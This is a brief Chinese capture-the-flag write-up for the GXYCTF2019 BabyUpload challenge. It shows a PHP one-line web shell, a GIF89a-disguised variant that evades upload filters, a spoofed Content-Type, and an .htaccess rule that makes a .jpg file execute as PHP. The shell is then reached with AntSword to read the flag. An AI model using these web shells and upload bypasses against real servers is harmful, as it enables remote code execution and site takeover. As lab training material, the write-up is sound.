[GXYCTF2019]BabyUpload
[GXYCTF2019]BabyUpload
打开靶场看到个上传文件的选项,应该是上传文件漏洞
上传个一句话木马文件尝试
<?php eval($_POST['cmd']);?>
提示不能带有php的后缀
改成jpg后缀,提示“上传类型也太露骨了吧!”
修改了Content-Type为image/jpeg还是不行
换了一种一句话木马
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>
此时上传成功
但是图片无法解析为php
使用.htaccess将文件解析为php
<FilesMatch "d.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
这里注意还是需要修改下Content-Type,否则还是会提示上传类型露骨
然后再上传一句话木马
此时通过蚁剑连接,在根目录下找到flag